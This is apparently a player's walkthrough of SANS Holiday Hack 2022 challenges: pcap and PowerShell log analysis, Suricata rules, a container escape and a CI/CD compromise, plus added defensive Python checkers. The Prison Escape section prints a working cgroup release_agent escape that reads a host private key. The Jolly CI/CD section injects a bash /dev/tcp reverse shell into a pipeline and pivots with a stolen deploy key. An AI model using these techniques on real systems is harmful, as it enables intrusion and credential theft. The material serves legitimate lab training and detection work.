The Tolkien Ring

Wireshark puzzle

Use the Wireshark Phishing terminal in the Tolkien Ring to solve the mysteries around the suspicious PCAP. Get hints for this challenge by typing hint in the upper panel of the terminal.

1. There are objects in the PCAP file that can be exported by Wireshark and/or Tshark. What type of objects can be exported from this PCAP?
http

2. What is the file name of the largest file we can export?
app.php

3. What packet number starts that app.php file?
687

4. What is the IP of the Apache server? 
192.185.57.242

5. What file is saved to the infected host?
Ref_Sept24-2020.zip

6. Attackers used bad TLS certificates in this traffic. Which countries were they registered to? Submit the names of the countries in alphabetical order separated by commas (Ex: Norway, South Korea).

Wireshark filter: tls.handshake.type == 2. Inspect the certificate section of the matching packets and look at the issuer. See https://ask.wireshark.org/question/15113/filter-only-tlsv12-packets/
Israel, South Sudan, United States
IL, SS, US

7. Is the host infected (Yes/No)?
yes

Event logger

Investigate the Windows event log mystery in the terminal or offline. Get hints for this challenge by typing hint in the upper panel of the Windows Event Logs terminal.

Grinchum successfully downloaded his keylogger and has gathered the admin credentials! 
We think he used PowerShell to find the Lembanh recipe and steal our secret ingredient. 
Luckily, we enabled PowerShell auditing and have exported the Windows PowerShell logs to a flat text file. 
Please help me analyze this file and answer my questions.
Ready to begin? 
1. What month/day/year did the attack take place? For example, 09/05/2021.
We used cut, uniq and sort to see that most of the traffic took place on 12/24/2022:

elf@2f0e2d66efaf:~$ grep -P -i -w "\d{2}/\d{2}/\d{4}" powershell.evtx.log |cut -f1 -d " "|cut -f2 -d$'\t'|uniq -c|sort
      1 ParameterBinding(Out-Default):
     34 10/31/2022
     36 11/25/2022
     36 12/18/2022
     46 10/13/2022
    240 11/11/2022
   1422 11/19/2022
   2088 12/13/2022
   2811 12/22/2022
   3540 12/24/2022
elf@2f0e2d66efaf:~$ 

2. An attacker got a secret from a file. What was the original file's name?
elf@72cff716d8ed:~$ cat powershell.evtx.log |grep -Fn "Add-Content"
recipe_updated.txt
───────────────────────────────────────────────────────────────────────────────────────────────
ParameterBinding(Add-Content): name=""Value""; value=""Preheat oven to 425F. Mix the flour, baking powder and salt into a large bowl. Add the butter and mix with a well till fine granules (easiest way is with an electric mixer). Then add the sugar and cinnamon, and mix them thoroughly.""
ParameterBinding(Add-Content): name=""Value""; value=""Finally add the cream, fish oil, and vanilla and stir them in with a fork until a nice, thick dough forms.""
ParameterBinding(Add-Content): name=""Value""; value=""Roll the dough out about 1/2 in thickness. Cut out 3-inch squares and transfer the dough to a cookie sheet.Criss-cross each square from corner-to-corner with a knife, lightly (not cutting through the dough).""
ParameterBinding(Add-Content): name=""Value""; value=""Bake for about 12 minutes or more (depending on the thickness of the bread) until it is set and lightly golden.""
ParameterBinding(Add-Content): name=""Value""; value=""Let cool completely before eating, this bread tastes better room temperature and dry. Also for more flavor you can add more cinnamon or other spices""
        Command Name = Add-Content
$foo | Add-Content -Path 'recipe_updated.txt'
CommandInvocation(Add-Content): ""Add-Content""
ParameterBinding(Add-Content): name=""Path""; value=""recipe_updated.txt""
ParameterBinding(Add-Content): name=""Value""; value=""""
$foo = Get-Content .\Recipe| % {$_-replace 'honey','fish oil'} $foo | Add-Content -Path 'recipe_updated.txt'
CommandInvocation(Add-Content): ""Add-Content""
ParameterBinding(Add-Content): name=""Path""; value=""recipe_updated.txt""
ParameterBinding(Add-Content): name=""Value""; value=""""
$foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'} $foo | Add-Content -Path 'recipe_updated.txt'
elf@2f0e2d66efaf:~$ 

3. The contents of the previous file were retrieved, changed, and stored to a variable by the attacker. This was done multiple times. Submit the last full PowerShell line that performed only these actions.
$foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'} $foo | Add-Content -Path 'recipe_updated.txt'


4. After storing the altered file contents into the variable, the attacker used the variable to run a separate command that wrote the modified data to a file. This was done multiple times. Submit the last full PowerShell line that performed only this action.
elf@72cff716d8ed:~$ tac powershell.evtx.log |grep -Fn "$"
: $foo | Add-Content -Path 'Recipe'

───────────────────────────────────────────────────────────────────────────────────────────────
36664:ParameterBinding(ForEach-Object): name=""Process""; value=""$_-replace 'honey','fish oil'""
36904:$foo = Get-Content .\Recipe| % {$_-replace 'honey','fish oil'}
36911:{$_-replace 'honey','fish oil'}
37022:ParameterBinding(ForEach-Object): name=""Process""; value=""$_-replace 'honey','fish oil'""
37128:$foo | Add-Content -Path 'recipe_updated.txt'
37581:$foo | Add-Content -Path 'Recipe.txt'
37879:$foo = Get-Content .\Recipe| % {$_-replace 'honey','fish oil'}
37886:{$_-replace 'honey','fish oil'}
37997:ParameterBinding(ForEach-Object): name=""Process""; value=""$_-replace 'honey','fish oil'""
38103:$foo | Add-Content -Path 'Recipe.txt'
38401:$foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'}
38408:{$_ -replace 'honey', 'fish oil'}
38519:ParameterBinding(ForEach-Object): name=""Process""; value=""$_ -replace 'honey', 'fish oil'""
38625:$foo | Add-Content -Path 'Recipe.txt'
38936:$foo | Add-Content -Path 'Recipe'
40158:$global:?
41368:{ Set-StrictMode -Version 1; $_.PSMessageDetails }
41437:{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }
41472:{ Set-StrictMode -Version 1; $_.OriginInfo }
41745:{ Set-StrictMode -Version 1; $_.PSMessageDetails }
41814:{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }
41849:{ Set-StrictMode -Version 1; $_.OriginInfo }

5. The attacker ran the previous command against a file multiple times. What is the name of this file?
: Recipe.txt


6. Were any files deleted? (Yes/No)
: Yes

7. Was the original file deleted? (Yes/No)
No.
It was replaced; see above.

8. What is the Event ID of the log that shows the actual command line used to delete the file?
: 4104

User Data:

"
Verbose 12/24/2022 3:05:42 AM   Microsoft-Windows-PowerShell    4105    Starting Command        "Started invocation of ScriptBlock ID: b0d4f117-b6d4-449b-a179-2c59d6b4f548
Runspace ID: 4181eda9-20e6-4eb9-8869-fe5fa6d5e663"
Verbose 12/24/2022 3:05:42 AM   Microsoft-Windows-PowerShell    4104    Execute a Remote Command        "Creating Scriptblock text (1 of 1):
del .\Recipe.txt

ScriptBlock ID: b0d4f117-b6d4-449b-a179-2c59d6b4f548
Path: "
Information     12/24/2022 3:05:42 AM   Microsoft-Windows-PowerShell    4103    Executing Pipeline      "CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""

9. Is the secret ingredient compromised (Yes/No)?
: Yes

10. What is the secret ingredient?
$foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'} $foo | Add-Content -Path 'recipe_updated.txt'
honey
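The questions above were answered by hand with grep, cut and uniq. The script below is an added example (not from the write-up or the challenge) that does the same work over a constructed excerpt: it assumes the flat export is tab-separated (Level, Date/Time, Provider, EventID, Task, Message), which is what the cut -d$'\t' pipeline above implies, and that a quoted message may continue over following lines. It counts events per day, pulls the text out of every 4104 script block, and flags blocks that delete a file.

```python
"""Parse a flat-text export of Windows PowerShell event logs and recover
the facts the write-up found by hand: events per day, 4104 Script Block
Logging text, and file deletions inside those script blocks.

Assumed layout (added example, inferred from the excerpt above): one
record per line with tab-separated columns Level, Date/Time, Provider,
EventID, Task, Message; a quoted Message may run on over following lines.
"""
import re
from collections import Counter

RECORD_START = re.compile(r'^(Verbose|Information|Warning|Error|Critical)\t')
DATE_RE = re.compile(r'^(\d{2}/\d{2}/\d{4}) ')
# Script block text sits between the "Creating Scriptblock text" header and
# the "ScriptBlock ID:" trailer of a 4104 message.
BLOCK_RE = re.compile(r'Creating Scriptblock text \(\d+ of \d+\):\n(.*?)\n\s*ScriptBlock ID:', re.S)
# Cmdlets and aliases that remove files, at the start of a script line.
DELETE_RE = re.compile(r'(?im)^\s*(?:del|erase|rm|ri|rd|rmdir|Remove-Item)\s+')


def parse_records(text):
    """Split an export into records: dicts with level, date, when, provider, event_id, task, message."""
    records = []
    current = None
    for line in text.splitlines():
        if RECORD_START.match(line):
            cols = line.split('\t', 5)
            if len(cols) < 6:
                continue
            level, when, provider, event_id, task, message = cols
            m = DATE_RE.match(when)
            current = {
                'level': level,
                'date': m.group(1) if m else None,
                'when': when,
                'provider': provider,
                'event_id': int(event_id),
                'task': task,
                'message': message.strip('"'),
            }
            records.append(current)
        elif current is not None:
            # Continuation of a multi-line quoted message (no quote tracking:
            # everything up to the next record header belongs to this one).
            current['message'] += '\n' + line.rstrip('"')
    return records


def count_by_date(records):
    """Events per calendar day, like the cut | uniq -c | sort pipeline in the write-up."""
    return Counter(r['date'] for r in records if r['date'])


def script_blocks(records):
    """(record, script text) for every 4104 Script Block Logging event."""
    out = []
    for r in records:
        if r['event_id'] != 4104:
            continue
        m = BLOCK_RE.search(r['message'])
        if m:
            out.append((r, m.group(1).strip()))
    return out


def find_deletions(records):
    """(timestamp, script text) for script blocks that delete files."""
    return [(r['when'], text) for r, text in script_blocks(records) if DELETE_RE.search(text)]


# Constructed sample in the assumed export layout; the 12/24 records mirror
# the excerpt in the write-up, the 12/22 one uses a made-up ScriptBlock ID.
SAMPLE_LOG = (
    "Verbose\t12/22/2022 11:03:10 PM\tMicrosoft-Windows-PowerShell\t4104\tExecute a Remote Command\t"
    "\"Creating Scriptblock text (1 of 1):\n"
    "$foo = Get-Content .\\Recipe| % {$_ -replace 'honey', 'fish oil'}\n"
    "\n"
    "ScriptBlock ID: 11111111-2222-3333-4444-555555555555\n"
    "Path: \"\n"
    "Verbose\t12/24/2022 3:05:42 AM\tMicrosoft-Windows-PowerShell\t4105\tStarting Command\t"
    "\"Started invocation of ScriptBlock ID: b0d4f117-b6d4-449b-a179-2c59d6b4f548\n"
    "Runspace ID: 4181eda9-20e6-4eb9-8869-fe5fa6d5e663\"\n"
    "Verbose\t12/24/2022 3:05:42 AM\tMicrosoft-Windows-PowerShell\t4104\tExecute a Remote Command\t"
    "\"Creating Scriptblock text (1 of 1):\n"
    "del .\\Recipe.txt\n"
    "\n"
    "ScriptBlock ID: b0d4f117-b6d4-449b-a179-2c59d6b4f548\n"
    "Path: \"\n"
    "Information\t12/24/2022 3:05:42 AM\tMicrosoft-Windows-PowerShell\t4103\tExecuting Pipeline\t"
    "\"CommandInvocation(PSConsoleHostReadLine): \"\"PSConsoleHostReadLine\"\"\n"
)

if __name__ == '__main__':
    recs = parse_records(SAMPLE_LOG)
    for day, n in sorted(count_by_date(recs).items(), key=lambda kv: kv[1]):
        print(f'{n:6d} {day}')
    for when, text in find_deletions(recs):
        print(f'deletion at {when}: {text}')
```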

Suricata Regatta

Help detect this kind of malicious activity in the future by writing some Suricata rules. Work with Dusty Giftwrap in the Tolkien Ring to get some hints.

Use your investigative analysis skills and the suspicious.pcap file to help develop Suricata rules for the elves!

There's a short list of rules started in suricata.rules in your home directory.

First off, the STINC (Santa's Team of Intelligent Naughty Catchers) has a lead for us.
They have some Dridex indicators of compromise to check out.
First, please create a Suricata rule to catch DNS lookups for adv.epostoday.uk.
Whenever there's a match, the alert message (msg) should read Known bad DNS lookup, possible Dridex infection.
Add your rule to suricata.rules

Once you think you have it right, run ./rule_checker to see how you've done!
As you get rules correct, rule_checker will ask for more to be added.

If you want to start fresh, you can exit the terminal and start again or cp suricata.rules.backup suricata.rules

Good luck, and thanks for helping save the North Pole!

First, please create a Suricata rule to catch DNS lookups for adv.epostoday.uk. Whenever there’s a match, the alert message (msg) should read Known bad DNS lookup, possible Dridex infection.

alert dns any any -> any any (msg:"Known bad DNS lookup, possible Dridex infection."; dns.query; content:"adv.epostoday.uk"; nocase; sid:1;)

STINC thanks you for your work with that DNS record! In this PCAP, it points to 192.185.57.242. Develop a Suricata rule that alerts whenever the infected IP address 192.185.57.242 communicates with internal systems over HTTP.

alert http $HOME_NET any <> 192.185.57.242 any (msg:"Investigate suspicious connections, possible Dridex infection";  sid:2;)

We heard that some naughty actors are using TLS certificates with a specific CN. Develop a Suricata rule to match and alert on an SSL certificate for heardbellith.Icanwepeh.nagoya. When your rule matches, the message (msg) should read Investigate bad certificates, possible Dridex infection

alert tls $EXTERNAL_NET any <> $HOME_NET any (msg:"Investigate bad certificates, possible Dridex infection"; tls.cert_subject; content:"CN=heardbellith.Icanwepeh.nagoya"; sid:3;)

OK, one more to rule them all and in the darkness find them. Let’s watch for one line from the JavaScript: let byte Characters = atob. Oh, and that string might be GZip compressed - I hope that’s OK! Just in case they try this again, please alert on that HTTP data with message Suspicious JavaScript function, possible Dridex infection

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"Suspicious JavaScript function, possible Dridex infection"; http.response_body; content:"let byteCharacters = atob"; nocase; sid:4;)

Elfen Ring

Clone with a difference

Clone a code repository. Get hints for this challenge from Bow Ninecandle in the Elfen Ring.

We just need you to clone one repo: git clone git@haugfactory.com:asnowball/aws_scripts.git 
This should be easy, right?

Thing is: it doesn't seem to be working for me. This is a public repository though. I'm so confused!

Please clone the repo and cat the README.md file.
Then runtoanswer and tell us the last word of the README.md file!

You head over to https://haugfactory.com/orcadmin/aws_scripts and see that asnowball has been renamed to orcadmin... easy... 

This is how I solved the puzzle:

bow@e61e3321e018:~$ mkdir test
bow@e61e3321e018:~$ cd test/
bow@e61e3321e018:~/test$ git init .
bow@e61e3321e018:~/test$ git remote add origin http://haugfactory.com/orcadmin/aws_scripts.git
bow@e61e3321e018:~/test$ git pull origin main
bow@e61e3321e018:~/test$ ls -lah
total 140K
drwxr-xr-x 3 bow bow 4.0K Dec 10 17:53 .
drwxr-xr-x 1 bow bow 4.0K Dec 10 17:52 ..
drwxr-xr-x 8 bow bow 4.0K Dec 10 17:53 .git
-rw-r--r-- 1 bow bow 6.1K Dec 10 17:53 README.md
-rw-r--r-- 1 bow bow 6.2K Dec 10 17:53 analytics.py
-rw-r--r-- 1 bow bow  19K Dec 10 17:53 compute.py
-rw-r--r-- 1 bow bow 7.1K Dec 10 17:53 container.py
-rw-r--r-- 1 bow bow  259 Dec 10 17:53 create_instance.py
-rw-r--r-- 1 bow bow  528 Dec 10 17:53 debug_instances.py
-rwxr-xr-x 1 bow bow 6.0K Dec 10 17:53 ec2-instances.py
-rw-r--r-- 1 bow bow 1.7K Dec 10 17:53 iam.py
-rw-r--r-- 1 bow bow  22K Dec 10 17:53 inventory.py
-rw-r--r-- 1 bow bow 6.5K Dec 10 17:53 network.py
-rw-r--r-- 1 bow bow  551 Dec 10 17:53 put_policy.py
-rw-r--r-- 1 bow bow 5.1K Dec 10 17:53 sample.json
-rw-r--r-- 1 bow bow  11K Dec 10 17:53 security.py
-rw-r--r-- 1 bow bow  774 Dec 10 17:53 send_ssm.py
bow@e61e3321e018:~/test$ cat README.md

..<snip>..

## Project status
If you have run out of energy or time for your project, put a note at the top of the README saying that development has slowed down or stopped completely. Someone may choose to fork your project or volunteer to step in as a maintainer or owner, allowing your project to keep going. You can also make an explicit request for maintainers.

bow@e61e3321e018:~/test$ runtoanswer maintainers
Your answer: maintainers

Checking......
Your answer is correct!

Prison Escape

Escape from a container. Get hints for this challenge from Bow Ninecandle in the Elfen Ring. What hex string appears in the host file /home/jailer/.ssh/jail.key.priv?

######################################################

Thu Dec 15 01:18:44 UTC 2022

On attempt [5] of trying to connect.

If no connection is made after [60] attempts

contact the holidayhack sys admins via discord.

######################################################

Greetings Noble Player,

You find yourself in a jail with a recently captured Dwarven Elf.

He desperately asks your help in escaping for he is on a quest to aid a friend in a search for treasure inside a crypto-mine.

If you can help him break free of his containment, he claims you would receive "MUCH GLORY!"

Please, do your best to un-contain yourself and find the keys to both of your freedom.

Solution… I definitely used the hints on this one

grinchum-land:~$ sudo su
grinchum-land:/home/samways# mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
grinchum-land:/home/samways# echo 1 > /tmp/cgrp/x/notify_on_release
grinchum-land:/home/samways# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
grinchum-land:/home/samways# echo "$host_path/cmd" > /tmp/cgrp/release_agent
grinchum-land:/home/samways# echo '#!/bin/sh' > /cmd
grinchum-land:/home/samways# echo "cat /home/jailer/.ssh/jail.key.priv > $host_path/output" >> /cmd
grinchum-land:/home/samways# chmod a+x /cmd
grinchum-land:/home/samways# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
grinchum-land:/home/samways# cat /output

                Congratulations! 

          You've found the secret for the 
          HHC22 container escape challenge!

                     .--._..--.
              ___   ( _'-_  -_.'
          _.-'   `-._|  - :- |
      _.-'           `--...__|
   .-'                       '--..___
  / `._                              \
   `. `._               one           |
     `. `._                           /
       '. `._    :__________....-----'
         `..`---'    |-_  _- |___...----..._
                     |_....--'             `.`.
               _...--'                       `.`.
          _..-'                             _.'.'
       .-'             step                _.'.'
       |                               _.'.'
       |                   __....------'-'
       |     __...------''' _|
       '--'''        |-  - _ |
               _.-''''''''''''''''''-._
            _.'                        |\
          .'                         _.' |
          `._          closer           |:.'
            `._                     _.' |
               `..__                 |  |
                    `---.._.--.    _|  |
                     | _   - | `-.._|_.'
          .--...__   |   -  _|
         .'_      `--.....__ |
        .'_                 `--..__
       .'_                         `.
      .'_    082bb339ec19de4935867   `-.
      `--..____                        _`.
               ```--...____          _..--'
                     | - _ ```---.._.'
                     |   - _ |
                     |_ -  - |
                     |   - _ |
                     | -_  -_|
                     |   - _ |
                     |   - _ |
                     | -_  -_|
grinchum-land:/home/samways# 
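The escape above only works because the container holds CAP_SYS_ADMIN (what --privileged grants), which is what allows mounting the cgroup v1 hierarchy and writing release_agent. As an added defender-side check that is not part of the write-up, the following Python decodes the CapEff mask from /proc/<pid>/status and inspects the mount table; the sample status and mount lines are constructed (the non-privileged mask is Docker's default capability set).

```python
"""Defender-side check for the cgroup release_agent escape used above.

The technique needs CAP_SYS_ADMIN (to mount the cgroup v1 filesystem and
write its release_agent), which --privileged grants. Added example, not
part of the write-up; the sample /proc status and mount lines below are
constructed.
"""
import re

# Capability bit numbers from include/uapi/linux/capability.h.
CAPS_OF_CONCERN = {
    'CAP_DAC_READ_SEARCH': 2,   # open_by_handle_at() reaches host files
    'CAP_SYS_MODULE': 16,       # load kernel modules
    'CAP_SYS_PTRACE': 19,       # attach to host processes if pid ns is shared
    'CAP_SYS_ADMIN': 21,        # mount(2), cgroup release_agent, and much more
}


def parse_capeff(status_text):
    """Effective capability mask (int) from the text of /proc/<pid>/status."""
    m = re.search(r'^CapEff:\s*([0-9a-fA-F]+)\s*$', status_text, re.M)
    if not m:
        raise ValueError('no CapEff line found')
    return int(m.group(1), 16)


def has_cap(mask, bit):
    return (mask >> bit) & 1 == 1


def caps_of_concern(mask):
    """Names of the dangerous capabilities present in an effective mask."""
    return sorted(name for name, bit in CAPS_OF_CONCERN.items() if has_cap(mask, bit))


def cgroup_mounts(mounts_text):
    """(mountpoint, fstype, writable) for each cgroup/cgroup2 mount in /proc/mounts or /etc/mtab."""
    out = []
    for line in mounts_text.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[2] in ('cgroup', 'cgroup2'):
            out.append((parts[1], parts[2], 'rw' in parts[3].split(',')))
    return out


def assess(status_text, mounts_text):
    """Summarise whether the release_agent escape is plausible from inside this container."""
    mask = parse_capeff(status_text)
    risky = caps_of_concern(mask)
    mounts = cgroup_mounts(mounts_text)
    sys_admin = 'CAP_SYS_ADMIN' in risky
    # release_agent exists only in cgroup v1; with CAP_SYS_ADMIN a fresh v1
    # hierarchy can be mounted even if the visible ones are read-only.
    v1_available = any(fstype == 'cgroup' for _, fstype, _ in mounts)
    return {
        'capeff': f'{mask:016x}',
        'caps_of_concern': risky,
        'rw_cgroup_mounts': [mp for mp, _, rw in mounts if rw],
        'release_agent_escape_plausible': sys_admin and v1_available,
    }


# Constructed samples. 0xa80425fb is Docker's default capability set; a
# --privileged container gets every capability the kernel defines
# (0x3fffffffff on a kernel with 38 capabilities).
STATUS_DEFAULT = 'Name:\tsh\nCapInh:\t0000000000000000\nCapEff:\t00000000a80425fb\n'
STATUS_PRIVILEGED = 'Name:\tsh\nCapInh:\t0000003fffffffff\nCapEff:\t0000003fffffffff\n'
MOUNTS_DEFAULT = (
    'overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/A,'
    'upperdir=/var/lib/docker/overlay2/abc/diff,workdir=/var/lib/docker/overlay2/abc/work 0 0\n'
    'cgroup /sys/fs/cgroup/memory cgroup ro,nosuid,nodev,noexec,relatime,memory 0 0\n'
)
MOUNTS_PRIVILEGED = MOUNTS_DEFAULT.replace(' cgroup ro,', ' cgroup rw,')

if __name__ == '__main__':
    # Run inside a container to check the real thing.
    with open('/proc/self/status') as f, open('/proc/mounts') as g:
        print(assess(f.read(), g.read()))
```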

Jolly CI/CD

Exploit a CI/CD pipeline. Get hints for this challenge from Tinsel Upatree in the Elfen Ring.

######################################################
 
Greetings Noble Player, 

Many thanks for answering our desperate cry for help!

You may have heard that some evil Sporcs have opened up a web-store selling 
counterfeit banners and flags of the many noble houses found in the land of 
the North! They have leveraged some dastardly technology to power their 
storefront, and this technology is known as PHP! 

***gasp*** 

This storefront utilizes a truly despicable amount of resources to keep the 
website up. And there is only a certain type of Christmas Magic capable of 
powering such a thing… an Elfen Ring!

Along with PHP there is something new we've not yet seen in our land. 
A technology called Continuous Integration and Continuous Deployment! 

Be wary! 

Many fair elves have suffered greatly but in doing so, they've managed to 
secure you a persistent connection on an internal network. 

BTW take excellent notes! 

Should you lose your connection or be discovered and evicted the 
elves can work to re-establish persistence. In fact, the sound of fans
and the sag in lighting tells me all the systems are booting up again right now.  

Please, for the sake of our Holiday help us recover the Ring and save Christmas!

So this one took a while… but was probably my favorite… used the hint to the repo and was off to the races.

grinchum-land:~$ git clone http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git
grinchum-land:~/wordpress.flag.net.internal$ git checkout abdea0ebb21b156c01f7533cea3b895c26198c98
grinchum-land:~/wordpress.flag.net.internal$ mkdir ~/.ssh && cp -R .ssh/.deploy* ~/.ssh/
grinchum-land:~/wordpress.flag.net.internal$ eval "$(ssh-agent -s)"
grinchum-land:~/wordpress.flag.net.internal$ mv ~/.ssh/.deploy ~/.ssh/id_ed25519
grinchum-land:~/wordpress.flag.net.internal$ mv ~/.ssh/.deploy.pub ~/.ssh/id_ed25519.pub
grinchum-land:~/wordpress.flag.net.internal$ chmod 600 ~/.ssh/id_*
grinchum-land:~/wordpress.flag.net.internal$ ssh-add ~/.ssh/.deploy
grinchum-land:~$ rm -rf wordpress.flag.net.internal/
grinchum-land:~/wordpress.flag.net.internal$ git clone git@gitlab.flag.net.internal:rings-of-powder/wordpress.flag.net.internal.git
grinchum-land:~/wordpress.flag.net.internal$ cat .gitlab-ci.yml 
stages:
  - deploy

deploy-job:      
  stage: deploy 
  environment: production
  before_script:
    - echo "Host *\n\tStrictHostKeyChecking no" >> ~/.ssh/config
    - eval $(ssh-agent -s)
    - echo "$SSH_PRIVATE_KEY" | ssh-add -
  script:
    - rsync --chown=www-data:www-data -atv --delete --progress ./ root@wordpress.flag.net.internal:/var/www/html

# add the reverse shell to .gitlab-ci.yml
grinchum-land:~/wordpress.flag.net.internal$ vim .gitlab-ci.yml 
deploy-job:      
  stage: deploy 
  environment: production
  script:
    - rsync -e "ssh -i /etc/gitlab-runner/hhc22-wordpress-deploy" --chown=www-data:www-data -atv --delete --progress ./ root@wordpress.flag.net.internal:/var/www/html
    - bash -i >& /dev/tcp/172.18.0.99/4545 0>&1  

grinchum-land:~/wordpress.flag.net.internal$ git add .
grinchum-land:~/wordpress.flag.net.internal$ git commit -a -m "4545"
[main 691d5b7] 4545
 1 file changed, 1 insertion(+), 1 deletion(-)
grinchum-land:~/wordpress.flag.net.internal$ git push
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Delta compression using up to 2 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 288 bytes | 288.00 KiB/s, done.
Total 3 (delta 2), reused 0 (delta 0), pack-reused 0
To gitlab.flag.net.internal:rings-of-powder/wordpress.flag.net.internal.git
   6b23aa2..691d5b7  main -> main


# start the listener
grinchum-land:~/wordpress.flag.net.internal$ nc -lnvp 4545
Listening on [0.0.0.0] (family 0, port 4545)
Connection from 172.18.1.149 38002 received!
bash: cannot set terminal process group (501): Not a tty
bash: no job control in this shell


<ziL/0/rings-of-powder/wordpress.flag.net.internal# cat /etc/gitlab-runner/hhc22-wordpress-deploy.pub
<ziL/0/rings-of-powder/wordpress.flag.net.internal# ssh -i /etc/gitlab-runner/hhc22-wordpress-deploy root@wordpress.flag.net.internal -t "bash --noprofile"
cat /flag.txt

                           Congratulations! You've found the HHC2022 Elfen Ring!


                           [ring drawn in block characters, with the flag at its centre:]
                                   oI40zIuCcN8c3MhKgQjOMN8lfYtVqcKT
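Everything the pipeline attack above needed was visible in the repository: a deploy key committed under .ssh/, host-key checking disabled, an rsync that runs as root on the web server, and a job script that anyone with push access can edit. The following Python linter is an added example (not the project's code) that flags those patterns with simple line-based rules; the two .gitlab-ci.yml samples are constructed from the versions shown above and the sample repository listing is constructed.

```python
"""Line-based linter for the weaknesses that made the pipeline above exploitable.

Added example, not the project's code. The rules are plain regexes over
.gitlab-ci.yml lines (no YAML parser needed); the sample configs are
constructed from the two versions in the write-up and the sample
repository listing is constructed.
"""
import re

CI_RULES = [
    # Disabling host-key checking lets anyone on the deploy path impersonate the target.
    ('host-key-checking-disabled', re.compile(r'StrictHostKeyChecking\s*=?\s*no', re.I)),
    # Deploying as root means a tampered job script runs as root on the web server.
    ('deploy-as-root', re.compile(r'\broot@[\w.-]+')),
    # A key path under /etc/gitlab-runner means the runner's own filesystem
    # (and its credentials) is reachable from job scripts.
    ('runner-host-key-path', re.compile(r'ssh\s+-i\s+/etc/gitlab-runner/')),
    # Classic reverse-shell idioms have no business in a deploy job.
    ('reverse-shell', re.compile(r'/dev/tcp/|\bnc\b[^\n]*\s-e\s|bash\s+-i\s*>&')),
    # rsync --delete into a web root turns any push into a destructive change.
    ('destructive-rsync', re.compile(r'\brsync\b[^\n]*--delete')),
]

KEY_PATH_RE = re.compile(r'(^|/)\.ssh/|(^|/)id_(rsa|ed25519|ecdsa|dsa)(\.pub)?$|\.pem$')
KEY_BODY_RE = re.compile(r'-----BEGIN (OPENSSH |RSA |EC |DSA |)PRIVATE KEY-----')


def lint_ci_config(text):
    """Return (line number, rule name, line) for each rule hit in a CI config."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in CI_RULES:
            if rx.search(line):
                findings.append((lineno, name, line.strip()))
    return findings


def find_committed_key_material(files):
    """files maps repo path -> content; returns paths that look like SSH key material."""
    return sorted(p for p, c in files.items() if KEY_PATH_RE.search(p) or KEY_BODY_RE.search(c))


# Constructed from the .gitlab-ci.yml as found in the repository above.
ORIGINAL_CI = """stages:
  - deploy

deploy-job:
  stage: deploy
  environment: production
  before_script:
    - echo "Host *\\n\\tStrictHostKeyChecking no" >> ~/.ssh/config
    - eval $(ssh-agent -s)
    - echo "$SSH_PRIVATE_KEY" | ssh-add -
  script:
    - rsync --chown=www-data:www-data -atv --delete --progress ./ root@wordpress.flag.net.internal:/var/www/html
"""

# Constructed from the tampered deploy job shown above.
TAMPERED_CI = """deploy-job:
  stage: deploy
  environment: production
  script:
    - rsync -e "ssh -i /etc/gitlab-runner/hhc22-wordpress-deploy" --chown=www-data:www-data -atv --delete --progress ./ root@wordpress.flag.net.internal:/var/www/html
    - bash -i >& /dev/tcp/172.18.0.99/4545 0>&1
"""

# Constructed repository listing; the key bodies are placeholders, not real keys.
SAMPLE_REPO = {
    '.gitlab-ci.yml': ORIGINAL_CI,
    '.ssh/.deploy': '-----BEGIN OPENSSH PRIVATE KEY-----\n<constructed placeholder>\n-----END OPENSSH PRIVATE KEY-----\n',
    '.ssh/.deploy.pub': 'ssh-ed25519 AAAA<constructed placeholder> deploy@example\n',
    'wp-config.php': '<?php\n',
}

if __name__ == '__main__':
    for label, cfg in (('original', ORIGINAL_CI), ('tampered', TAMPERED_CI)):
        for lineno, name, line in lint_ci_config(cfg):
            print(f'{label}:{lineno}: {name}: {line}')
    print('committed key material:', find_committed_key_material(SAMPLE_REPO))
```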


Cloud Ring

AWS CLI Intro

Try out some basic AWS command line skills in this terminal. Talk to Jill Underpole in the Cloud Ring for hints.

Great! When you're done, you can quit with q.
Next, please configure the default aws cli credentials with the access key AKQAAYRKO7A5Q5XUY2IY, the secret key qzTscgNdcdwIo/soPKPoJn9sBrl5eMQQL19iO5uf and the region us-east-1.
https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-quickstart.html#cli-configure-quickstart-config

───────────────────────────────────────────────────────────────────────────────────────────────
elf@2c99e7222027:~$ aws configure
AWS Access Key ID [None]: AKQAAYRKO7A5Q5XUY2IY
elf@2c99e7222027:~$ aws sts get-caller-identity
{
    "UserId": "AKQAAYRKO7A5Q5XUY2IY",
    "Account": "602143214321",
    "Arn": "arn:aws:iam::602143214321:user/elf_helpdesk"
}
elf@2c99e7222027:~$ 

TruffleHog

Use Trufflehog to find secrets in a Git repo. Work with Jill Underpole in the Cloud Ring for hints. What’s the name of the file that has AWS credentials?

  1. Use Trufflehog to find credentials in the Gitlab instance at https://haugfactory.com/asnowball/aws_scripts.git. Configure these credentials for us-east-1 and then run: $ aws sts get-caller-identity
elf@dd1ea5c9dd6e:~/test$ trufflehog git https://haugfactory.com/asnowball/aws_scripts.git
🐷🔑🐷  TruffleHog. Unearth your secrets. 🐷🔑🐷

Found unverified result 🐷🔑❓
Detector Type: AWS
Decoder Type: PLAIN
Raw result: AKIAAIDAYRANYAHGQOHD
Timestamp: 2022-09-07 07:53:12 -0700 -0700
Line: 6
Commit: 106d33e1ffd53eea753c1365eafc6588398279b5
File: put_policy.py
Email: asnowball <alabaster@northpolechristmastown.local>
Repository: https://haugfactory.com/asnowball/aws_scripts.git
